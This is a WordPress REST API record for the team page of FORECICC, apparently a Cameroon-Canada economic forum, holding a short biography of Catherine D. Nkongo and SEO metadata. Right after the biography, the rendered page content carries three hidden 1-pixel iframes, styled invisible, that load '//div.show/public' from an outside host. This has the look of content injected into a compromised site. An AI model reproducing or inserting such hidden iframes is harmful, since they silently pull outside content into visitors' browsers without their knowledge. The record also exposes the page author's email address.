{"id":141,"date":"2024-12-05T22:45:12","date_gmt":"2024-12-05T22:45:12","guid":{"rendered":"https:\/\/forecicc.com\/contact\/"},"modified":"2025-03-07T09:33:56","modified_gmt":"2025-03-07T09:33:56","slug":"equipe","status":"publish","type":"page","link":"https:\/\/forecicc.com\/en\/equipe\/","title":{"rendered":"TEAM"},"content":{"rendered":"<div data-elementor-type=\"wp-page\" data-elementor-id=\"141\" class=\"elementor elementor-141\">\n\t\t\t\t<div class=\"elementor-element elementor-element-1cf3300 e-grid e-con-full e-con e-parent\" data-id=\"1cf3300\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t<div class=\"elementor-element elementor-element-5758b30 elementor-widget elementor-widget-image\" data-id=\"5758b30\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"443\" height=\"481\" src=\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png\" class=\"attachment-large size-large wp-image-822\" alt=\"\" srcset=\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png 443w, https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513-276x300.png 276w, https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513-11x12.png 11w\" sizes=\"(max-width: 443px) 100vw, 443px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4260f9a elementor-widget elementor-widget-text-editor\" data-id=\"4260f9a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p align=\"justify\"><b>Catherine D. NKONGO, PhD.<\/b><\/p><p align=\"justify\">Catherine has founded and run an international consulting firm in Ottawa, Canada, for the past five\nyears (www.acxed.com). Prior to that, she worked for ten years as a political analyst and legal advisor\nto the Prime Minister of Cameroon. Catherine co-organised the \" <i>She trades; she invests<\/i>\u00a0\" economic mission to Canada in 2022. She is passionate about women's entrepreneurship and resilient\nleadership.economic<\/p><div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div><div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div><div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>","protected":false},"excerpt":{"rendered":"<p>Catherine D. NKONGO, PhD. Catherine a fond\u00e9 et dirige une firme de consultation internationale \u00e0 Ottawa, Canada, depuis cinq ans (www.acxed.com). Avant cela, elle a travaill\u00e9 pendant une dizaine d\u2019ann\u00e9es en tant qu\u2019analyste politique et conseill\u00e8re juridique du Premier ministre du Cameroun. Catherine a co-organis\u00e9 la mission \u00e9conomique \u00ab She trades, she invests\u00a0\u00bb au Canada [&hellip;]<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_uag_custom_page_level_css":"","footnotes":""},"class_list":["post-141","page","type-page","status-publish","hentry"],"aioseo_notices":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u00c9quipe - FORECICC<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/forecicc.com\/en\/equipe\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u00c9quipe - FORECICC\" \/>\n<meta property=\"og:description\" content=\"Catherine D. NKONGO, PhD. Catherine a fond\u00e9 et dirige une firme de consultation internationale \u00e0 Ottawa, Canada, depuis cinq ans (www.acxed.com). Avant cela, elle a travaill\u00e9 pendant une dizaine d\u2019ann\u00e9es en tant qu\u2019analyste politique et conseill\u00e8re juridique du Premier ministre du Cameroun. Catherine a co-organis\u00e9 la mission \u00e9conomique \u00ab She trades, she invests\u00a0\u00bb au Canada [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/forecicc.com\/en\/equipe\/\" \/>\n<meta property=\"og:site_name\" content=\"FORECICC\" \/>\n<meta property=\"article:modified_time\" content=\"2025-03-07T09:33:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png\" \/>\n\t<meta property=\"og:image:width\" content=\"443\" \/>\n\t<meta property=\"og:image:height\" content=\"481\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/forecicc.com\/equipe\/\",\"url\":\"https:\/\/forecicc.com\/equipe\/\",\"name\":\"\u00c9quipe - FORECICC\",\"isPartOf\":{\"@id\":\"https:\/\/forecicc.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/forecicc.com\/equipe\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/forecicc.com\/equipe\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png\",\"datePublished\":\"2024-12-05T22:45:12+00:00\",\"dateModified\":\"2025-03-07T09:33:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/forecicc.com\/equipe\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/forecicc.com\/equipe\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/forecicc.com\/equipe\/#primaryimage\",\"url\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png\",\"contentUrl\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/forecicc.com\/equipe\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/forecicc.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00c9quipe\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/forecicc.com\/#website\",\"url\":\"https:\/\/forecicc.com\/\",\"name\":\"FORECICC\",\"description\":\"FORUM \u00c9CONOMIQUE INTERNATIONAL CAMEROUN-CANADA\",\"publisher\":{\"@id\":\"https:\/\/forecicc.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/forecicc.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/forecicc.com\/#organization\",\"name\":\"FORECICC\",\"url\":\"https:\/\/forecicc.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/forecicc.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png\",\"contentUrl\":\"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png\",\"width\":301,\"height\":314,\"caption\":\"FORECICC\"},\"image\":{\"@id\":\"https:\/\/forecicc.com\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u00c9quipe - FORECICC","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/forecicc.com\/en\/equipe\/","og_locale":"en_US","og_type":"article","og_title":"\u00c9quipe - FORECICC","og_description":"Catherine D. NKONGO, PhD. Catherine a fond\u00e9 et dirige une firme de consultation internationale \u00e0 Ottawa, Canada, depuis cinq ans (www.acxed.com). Avant cela, elle a travaill\u00e9 pendant une dizaine d\u2019ann\u00e9es en tant qu\u2019analyste politique et conseill\u00e8re juridique du Premier ministre du Cameroun. Catherine a co-organis\u00e9 la mission \u00e9conomique \u00ab She trades, she invests\u00a0\u00bb au Canada [&hellip;]","og_url":"https:\/\/forecicc.com\/en\/equipe\/","og_site_name":"FORECICC","article_modified_time":"2025-03-07T09:33:56+00:00","og_image":[{"width":443,"height":481,"url":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/forecicc.com\/equipe\/","url":"https:\/\/forecicc.com\/equipe\/","name":"\u00c9quipe - FORECICC","isPartOf":{"@id":"https:\/\/forecicc.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/forecicc.com\/equipe\/#primaryimage"},"image":{"@id":"https:\/\/forecicc.com\/equipe\/#primaryimage"},"thumbnailUrl":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png","datePublished":"2024-12-05T22:45:12+00:00","dateModified":"2025-03-07T09:33:56+00:00","breadcrumb":{"@id":"https:\/\/forecicc.com\/equipe\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/forecicc.com\/equipe\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/forecicc.com\/equipe\/#primaryimage","url":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png","contentUrl":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/8b836d27427bd70cc157b21b490eda71-e1735651969513.png"},{"@type":"BreadcrumbList","@id":"https:\/\/forecicc.com\/equipe\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/forecicc.com\/"},{"@type":"ListItem","position":2,"name":"\u00c9quipe"}]},{"@type":"WebSite","@id":"https:\/\/forecicc.com\/#website","url":"https:\/\/forecicc.com\/","name":"FORECICC","description":"INTERNATIONAL ECONOMIC FORUM CAMEROON-CANADA","publisher":{"@id":"https:\/\/forecicc.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/forecicc.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/forecicc.com\/#organization","name":"FORECICC","url":"https:\/\/forecicc.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/forecicc.com\/#\/schema\/logo\/image\/","url":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png","contentUrl":"https:\/\/forecicc.com\/wp-content\/uploads\/2024\/12\/cropped-1_LOGO_FORUM_BLACK_FR-Sans-fond-Croped.png","width":301,"height":314,"caption":"FORECICC"},"image":{"@id":"https:\/\/forecicc.com\/#\/schema\/logo\/image\/"}}]}},"uagb_featured_image_src":{"full":false,"thumbnail":false,"medium":false,"medium_large":false,"large":false,"1536x1536":false,"2048x2048":false,"trp-custom-language-flag":false,"depicter-thumbnail":false},"uagb_author_info":{"display_name":"katenkongo@gmail.com","author_link":"https:\/\/forecicc.com\/en\/author\/katenkongogmail-com\/"},"uagb_comment_info":0,"uagb_excerpt":"Catherine D. NKONGO, PhD. Catherine a fond\u00e9 et dirige une firme de consultation internationale \u00e0 Ottawa, Canada, depuis cinq ans (www.acxed.com). Avant cela, elle a travaill\u00e9 pendant une dizaine d\u2019ann\u00e9es en tant qu\u2019analyste politique et conseill\u00e8re juridique du Premier ministre du Cameroun. Catherine a co-organis\u00e9 la mission \u00e9conomique \u00ab She trades, she invests\u00a0\u00bb au Canada&hellip;","_links":{"self":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages\/141","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/comments?post=141"}],"version-history":[{"count":36,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages\/141\/revisions"}],"predecessor-version":[{"id":1504,"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/pages\/141\/revisions\/1504"}],"wp:attachment":[{"href":"https:\/\/forecicc.com\/en\/wp-json\/wp\/v2\/media?parent=141"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}